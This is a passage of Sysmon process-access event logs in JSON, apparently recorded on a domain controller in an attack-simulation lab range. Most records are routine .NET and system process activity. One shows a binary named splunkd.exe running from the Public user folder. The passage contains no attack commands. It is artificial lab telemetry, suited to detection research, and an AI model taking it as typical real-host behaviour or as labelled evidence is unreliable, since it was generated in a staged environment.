{"EventTime":"2020-08-01 07:03:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8984,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:04.701\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:04.701","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8985,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:05.076\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A9-5F25-0000-00105A491100}\r\nTargetProcessId: 4380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:05.076","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A9-5F25-0000-00105A491100}","TargetProcessId":"4380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8986,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:05.076\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A9-5F25-0000-00105A491100}\r\nTargetProcessId: 4380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:05.076","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A9-5F25-0000-00105A491100}","TargetProcessId":"4380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8987,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:05.091\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A9-5F25-0000-00105A491100}\r\nTargetProcessId: 4380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:05.091","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A9-5F25-0000-00105A491100}","TargetProcessId":"4380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8988,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:05.091\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:05.091","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8989,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:05.451\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A9-5F25-0000-0010CA4C1100}\r\nTargetProcessId: 1608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:05.451","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A9-5F25-0000-0010CA4C1100}","TargetProcessId":"1608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8990,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:05.451\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A9-5F25-0000-0010CA4C1100}\r\nTargetProcessId: 1608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:05.451","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A9-5F25-0000-0010CA4C1100}","TargetProcessId":"1608","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8991,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:05.466\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A9-5F25-0000-0010CA4C1100}\r\nTargetProcessId: 1608\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 